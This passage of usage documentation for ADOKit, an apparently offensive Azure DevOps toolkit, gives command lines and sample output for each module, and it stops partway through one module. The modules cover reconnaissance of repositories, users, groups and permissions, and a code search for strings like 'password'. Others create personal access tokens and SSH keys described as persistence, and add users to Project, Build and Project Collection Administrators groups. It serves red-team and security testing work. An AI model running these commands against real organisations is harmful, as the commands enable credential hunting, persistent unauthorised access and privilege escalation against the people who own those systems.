Search for repositories by repository name in Azure DevOps instance
Provide the searchrepo
module and your search criteria in the /search:
command-line argument, along with any relevant authentication information and URL. This will output the matching repository name and URL.
ADOKit.exe searchrepo /credential:apiKey /url:https://dev.azure.com/organizationName /search:cred
ADOKit.exe searchrepo /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:cred
C:\>ADOKit.exe searchrepo /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"test"
==================================================
Module: searchrepo
Auth Type: API Key
Search Term: test
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/29/2023 9:26:57 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Name | URL
-----------------------------------------------------------------------------------
TestProject2 | https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2
TestProject | https://dev.azure.com/YourOrganization/TestProject/_git/TestProject
3/29/23 13:26:59 Finished execution of searchrepo
Discover projects being used in Azure DevOps instance
Provide the listproject
module, along with any relevant authentication information and URL. This will output the project name, visibility (public or private) and URL.
ADOKit.exe listproject /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listproject /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listproject /credential:apiKey /url:https://dev.azure.com/YourOrganization
==================================================
Module: listproject
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 7:44:59 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Name | Visibility | URL
-----------------------------------------------------------------------------------------------------
TestProject2 | private | https://dev.azure.com/YourOrganization/TestProject2
MaraudersMap | private | https://dev.azure.com/YourOrganization/MaraudersMap
ProjectWithMultipleRepos | private | http s://dev.azure.com/YourOrganization/ProjectWithMultipleRepos
TestProject | private | https://dev.azure.com/YourOrganization/TestProject
4/4/23 11:45:04 Finished execution of listproject
Search for projects by project name in Azure DevOps instance
Provide the searchproject
module and your search criteria in the /search:
command-line argument, along with any relevant authentication information and URL. This will output the matching project name, visibility (public or private) and URL.
ADOKit.exe searchproject /credential:apiKey /url:https://dev.azure.com/organizationName /search:cred
ADOKit.exe searchproject /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:cred
C:\>ADOKit.exe searchproject /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"map"
==================================================
Module: searchproject
Auth Type: API Key
Search Term: map
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 7:45:30 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Name | Visibility | URL
-----------------------------------------------------------------------------------------------------
MaraudersMap | private | https://dev.azure.com/YourOrganization/MaraudersMap
4/4/23 11:45:31 Finished execution of searchproject
Search for code containing a given keyword in Azure DevOps instance
Provide the searchcode
module and your search criteria in the /search:
command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching code file, along with the line in the code that matched.
ADOKit.exe searchcode /credential:apiKey /url:https://dev.azure.com/organizationName /search:password
ADOKit.exe searchcode /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:password
C:\>ADOKit.exe searchcode /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /search:"password"
==================================================
Module: searchcode
Auth Type: Cookie
Search Term: password
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/29/2023 3:22:21 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[>] URL: https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap?path=/Test.cs
|_ Console.WriteLine("PassWord");
|_ this is some text that has a password in it
[>] URL: https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2?path=/Program.cs
|_ Console.WriteLine("PaSsWoRd");
[*] Match count : 3
3/29/23 19:22:22 Finished execution of searchco de
Search for files in repositories containing a given keyword in the file name in Azure DevOps
Provide the searchfile
module and your search criteria in the /search:
command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching file in its respective repository.
ADOKit.exe searchfile /credential:apiKey /url:https://dev.azure.com/organizationName /search:azure-pipeline
ADOKit.exe searchfile /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:azure-pipeline
C:\>ADOKit.exe searchfile /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /search:"test"
==================================================
Module: searchfile
Auth Type: Cookie
Search Term: test
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/29/2023 11:28:34 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
File URL
----------------------------------------------------------------------------------------------------
https://dev.azure.com/YourOrganization/MaraudersMap/_git/4f159a8e-5425-4cb5-8d98-31e8ac86c4fa?path=/Test.cs
https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/c1ba578c-1ce1-46ab-8827-f245f54934e9?path=/Test.c s
https://dev.azure.com/YourOrganization/TestProject/_git/fbcf0d6d-3973-4565-b641-3b1b897cfa86?path=/test.cs
3/29/23 15:28:37 Finished execution of searchfile
Create a personal access token (PAT) for a user that can be used for persistence to an Azure DevOps instance.
Provide the createpat
module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, date valid til, and token content for the PAT created. The name of the PAT created will be ADOKit-
followed by a random string of 8 characters. The date the PAT is valid until will be 1 year from the date of creation, as that is the maximum that Azure DevOps allows.
ADOKit.exe createpat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe createpat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization
==================================================
Module: createpat
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/31/2023 2:33:09 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
PAT ID | Name | Scope | Valid Until | Token Value
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8776252f-9e03-48ea-a85c-f880cc830898 | ADOKit- rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM | tokenValueWouldBeHere
3/31/23 18:33:10 Finished execution of createpat
List all personal access tokens (PAT's) for a given user in an Azure DevOps instance.
Provide the listpat
module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, and date valid til for all active PAT's for the user.
ADOKit.exe listpat /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listpat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listpat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization
==================================================
Module: listpat
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/31/2023 2:33:17 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
PAT ID | Name | Scope | Valid Until
-------------------------------------------------------------------------------------------------------------------------------------------
9b354668-4424-4505-a35f-d0989034da18 | test-token | app_token | 4/29/2023 1:20:45 PM
8776252f-9e03-48ea-a85c-f880cc8308 98 | ADOKit-rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM
3/31/23 18:33:18 Finished execution of listpat
Remove a PAT for a given user in an Azure DevOps instance.
Provide the removepat
module, along with any relevant authentication information and URL. Additionally, provide the ID for the PAT in the /id:
argument. This will output whether the PAT was removed or not, and then will list the current active PAT's for the user after performing the removal.
ADOKit.exe removepat /credential:apiKey /url:https://dev.azure.com/organizationName /id:000-000-0000...
ADOKit.exe removepat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /id:000-000-0000...
C:\>ADOKit.exe removepat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /id:0b20ac58-fc65-4b66-91fe-4ff909df7298
==================================================
Module: removepat
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 11:04:59 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[+] SUCCESS: PAT with ID 0b20ac58-fc65-4b66-91fe-4ff909df7298 was removed successfully.
PAT ID | Name | Scope | Valid Until
-------------------------------------------------------------------------------------------------------------------------------------------
9b354668-4424-4505-a35f-d098903 4da18 | test-token | app_token | 4/29/2023 1:20:45 PM
4/3/23 15:05:00 Finished execution of removepat
Create an SSH key for a user that can be used for persistence to an Azure DevOps instance.
Provide the createsshkey
module, along with any relevant authentication information and URL. Additionally, provide your public SSH key in the /sshkey:
argument. This will output the SSH key ID, name, scope, date valid til, and last 20 characters of the public SSH key for the SSH key created. The name of the SSH key created will be ADOKit-
followed by a random string of 8 characters. The date the SSH key is valid until will be 1 year from the date of creation, as that is the maximum that Azure DevOps allows.
ADOKit.exe createsshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /sshkey:"ssh-rsa ABC123"
C:\>ADOKit.exe createsshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /sshkey:"ssh-rsa ABC123"
==================================================
Module: createsshkey
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 2:51:22 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
SSH Key ID | Name | Scope | Valid Until | Public SSH Key
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
fbde9f3e-bbe3-4442-befb-c2ddeab75c58 | ADOKit-iCBfYfFR | app_token | 4/3/2024 12:00:00 AM | ...hOLNYMk5LkbLRMG36RE=
4/3/23 18:51:24 Finished execution of createsshkey
List all public SSH keys for a given user in an Azure DevOps instance.
Provide the listsshkey
module, along with any relevant authentication information and URL. This will output the SSH Key ID, name, scope, and date valid til for all active SSH key's for the user. Additionally, it will print the last 20 characters of the public SSH key.
ADOKit.exe listsshkey /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listsshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listsshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization
==================================================
Module: listsshkey
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 11:37:10 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
SSH Key ID | Name | Scope | Valid Until | Public SSH Key
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=
4/3/23 15:37:11 Finished execution of listsshkey
Remove an SSH key for a given user in an Azure DevOps instance.
Provide the removesshkey
module, along with any relevant authentication information and URL. Additionally, provide the ID for the SSH key in the /id:
argument. This will output whether SSH key was removed or not, and then will list the current active SSH key's for the user after performing the removal.
ADOKit.exe removesshkey /credential:apiKey /url:https://dev.azure.com/organizationName /id:000-000-0000...
ADOKit.exe removesshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /id:000-000-0000...
C:\>ADOKit.exe removesshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /id:a199c036-d7ed-4848-aae8-2397470aff97
==================================================
Module: removesshkey
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 1:50:08 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[+] SUCCESS: SSH key with ID a199c036-d7ed-4848-aae8-2397470aff97 was removed successfully.
SSH Key ID | Name | Scope | Valid Until | Public SSH Key
---------------------------------------------------------------------------------------------------------------------------------------------- -------------------------
ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=
4/3/23 17:50:09 Finished execution of removesshkey
List users within an Azure DevOps instance
Provide the listuser
module, along with any relevant authentication information and URL. This will output the username, display name and user principal name.
ADOKit.exe listuser /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listuser /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listuser /credential:apiKey /url:https://dev.azure.com/YourOrganization
==================================================
Module: listuser
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 4:12:07 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Username | Display Name | UPN
------------------------------------------------------------------------------------------------------------------------------------------------------------
user1 | User 1 | user1@YourOrganization.onmicrosoft.com
jsmith | John Smith | jsmith@YourOrganization.onmicrosoft.com
rsmith | Ron Smith | rsmith@YourOrganization.onmicrosoft.com
user2 | User 2 | user2@YourOrganization.onmicrosoft.com
4/3/23 20:12:08 Finished execution of listuser
Search for given user(s) in Azure DevOps instance
Provide the searchuser
module and your search criteria in the /search:
command-line argument, along with any relevant authentication information and URL. This will output the matching username, display name and user principal name.
ADOKit.exe searchuser /credential:apiKey /url:https://dev.azure.com/organizationName /search:user
ADOKit.exe searchuser /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:user
C:\>ADOKit.exe searchuser /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"user"
==================================================
Module: searchuser
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 4:12:23 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Username | Display Name | UPN
------------------------------------------------------------------------------------------------------------------------------------------------------------
user1 | User 1 | user1@YourOrganization.onmic rosoft.com
user2 | User 2 | user2@YourOrganization.onmicrosoft.com
4/3/23 20:12:24 Finished execution of searchuser
List groups within an Azure DevOps instance
Provide the listgroup
module, along with any relevant authentication information and URL. This will output the user principal name, display name and description of group.
ADOKit.exe listgroup /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listgroup /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listgroup /credential:apiKey /url:https://dev.azure.com/YourOrganization
==================================================
Module: listgroup
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 4:48:45 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
UPN | Display Name | Description
------------------------------------------------------------------------------------------------------------------------------------------------------------
[TestProject]\Contributors | Contributors | Members of this group can add, modify, and delete items w ithin the team project.
[TestProject2]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[YourOrganization]\Project-Scoped Users | Project-Scoped Users | Members of this group will have limited visibility to organization-level data
[ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Readers | Readers | Members of this group have access to the team project.
[YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by t he test controllers set up for this project collection.
[MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
[TEAM FOUNDATION]\Enterprise Service Accounts | Enterprise Service Accounts | Members of this group have service-level permissions in this enterprise. For service accounts only.
[YourOrganization]\Security Service Group | Security Service Group | Identities which are granted explicit permission to a resource will be automatically added to this group if they were not previously a member of any other group.
[TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management
---SNIP---
4/3/23 20:48:46 Finished execution of listgroup
Search for given group(s) in Azure DevOps instance
Provide the searchgroup
module and your search criteria in the /search:
command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name and description for the matching group.
ADOKit.exe searchgroup /credential:apiKey /url:https://dev.azure.com/organizationName /search:"someGroup"
ADOKit.exe searchgroup /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:"someGroup"
C:\>ADOKit.exe searchgroup /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"admin"
==================================================
Module: searchgroup
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 4:48:41 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
UPN | Display Name | Description
------------------------------------------------------------------------------------------------------------------------------------------------------------
[TestProject2]\Build Administrators | Build Administrators | Members of this group can create, mod ify and delete build definitions and manage queued and completed builds.
[ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management
[TestProject]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[TestProject2]\Project Administrators | Project Administrators | Members of th is group can perform all operations in the team project.
[YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.
[ProjectWithMultipleRepos]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[MaraudersMap]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[YourOrganization]\Project Collection Build Administrators | Project Collection Build Administrators | Members of this group should include accounts for people who should be able to administer the build resources.
[TestProject]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
4/3/23 20:48:42 Finished execution of searchgroup
List all group members for a given group
Provide the getgroupmembers
module and the group(s) you would like to search for in the /group:
command-line argument, along with any relevant authentication information and URL. This will output the user principal name of the group matching, along with each group member of that group including the user's mail address and display name.
ADOKit.exe getgroupmembers /credential:apiKey /url:https://dev.azure.com/organizationName /group:"someGroup"
ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /group:"someGroup"
C:\>ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /group:"admin"
==================================================
Module: getgroupmembers
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 9:11:03 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[TestProject2]\Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1
[TestProject2]\Build Administrators | user2@YourOrganization.onmicrosoft.com | User 2
[MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
[MaraudersMap]\Project Administrators | rsmith@YourOrganization.onmicrosoft.com | Ron Smith
[TestProject2]\Project Administrators | user1@YourOrganization.onmicrosoft.com | User 1
[TestProject2]\Project Administrators | user2@YourOrganization.onmicrosoft.com | User 2
[YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith
[ProjectWithMultipleRepos]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
[MaraudersMap]\Build Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
4/4/23 13:11:09 Finished execution of getgroupmembers
Get a listing of who has permissions to a given project.
Provide the getpermissions
module and the project you would like to search for in the /project:
command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name and description for the matching group. Additionally, this will output the group members for each of those groups.
ADOKit.exe getpermissions /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someproject"
ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someproject"
C:\>ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"
==================================================
Module: getpermissions
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 9:11:16 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
UPN | Display Name | Description
------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Build Administrators | Build Administrators | Mem bers of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
[MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[MaraudersMap]\Project Valid Users | Project Valid Users | Members of this group have access to the team project.
[MaraudersMap]\Readers | Readers | Members of this group have access to the team project.
[*] INFO: List ing group members for each group that has permissions to this project
GROUP NAME: [MaraudersMap]\Build Administrators
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
GROUP NAME: [MaraudersMap]\Contributors
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Contributo rs | user1@YourOrganization.onmicrosoft.com | User 1
[MaraudersMap]\Contributors | user2@YourOrganization.onmicrosoft.com | User 2
GROUP NAME: [MaraudersMap]\MaraudersMap Team
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\MaraudersMap Team | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
GROUP NAME: [MaraudersMap]\Project Administrators
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
GROUP NAME: [MaraudersMap]\Project Valid Users
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
GROUP NAME: [MaraudersMap]\Readers
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Readers | jsmith@YourOrganization.onmicrosoft.com | John Smith
4/4/23 13:11:18 Finished execution of getpermissions
Add a user to the Project Administrators group for a given project.
Provide the addprojectadmin
module along with a /project:
and /user:
for a given user to be added to the Project Administrators
group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe addprojectadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
C:\>ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"
==================================================
Module: addprojectadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 2:52:45 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Project Administrators group for the maraudersmap project.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
-------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
[MaraudersMap]\Project Administrators | user1@YourOrganization.onmicrosoft.com | User 1
4/4/23 18:52:47 Finished execution of addprojectadmin
Remove a user from the Project Administrators group for a given project.
Provide the removeprojectadmin
module along with a /project:
and /user:
for a given user to be removed from the Project Administrators
group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe removeprojectadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
C:\>ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"
==================================================
Module: removeprojectadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 3:19:43 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Administrators group for the maraudersmap project.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
4/4/23 19:19:44 Finished execution of removeprojectadmin
Add a user to the Build Administrators group for a given project.
Provide the addbuildadmin
module along with a /project:
and /user:
for a given user to be added to the Build Administrators
group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe addbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
C:\>ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"
==================================================
Module: addbuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 3:41:51 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Build Administrators group for the maraudersmap project.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
-------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------
[MaraudersMap]\Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1
4/4/23 19:41:55 Finished execution of addbuildadmin
Remove a user from the Build Administrators group for a given project.
Provide the removebuildadmin
module along with a /project:
and /user:
for a given user to be removed from the Build Administrators
group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe removebuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
C:\>ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"
==================================================
Module: removebuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 3:42:10 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Build Administrators group for the maraudersmap project.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------
4/4/23 19:42:11 Finished execution of removebuildadmin
Add a user to the Project Collection Administrators group.
Provide the addcollectionadmin
module along with a /user:
for a given user to be added to the Project Collection Administrators
group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe addcollectionadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: addcollectionadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 4:04:40 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Project Collection Administrators group.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
-------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------------
[YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith
[YourOrganization]\Project Collection Administrators | user1@YourOrganization.onmicrosoft.com | User 1
4/4/23 20:04:43 Finished execution of addcollectionadmin
Remove a user from the Project Collection Administrators group.
Provide the removecollectionadmin
module along with a /user:
for a given user to be removed from the Project Collection Administrators
group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe removecollectionadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: removecollectionadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 4:10:35 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Collection Administrators group.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------
[YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith
4/4/23 20:10:38 Finished execution of removecollectionadmin
Add a user to the Project Collection Build Administrators group.
Provide the addcollectionbuildadmin
module along with a /user:
for a given user to be added to the Project Collection Build Administrators
group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe addcollectionbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: addcollectionbuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 8:21:39 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
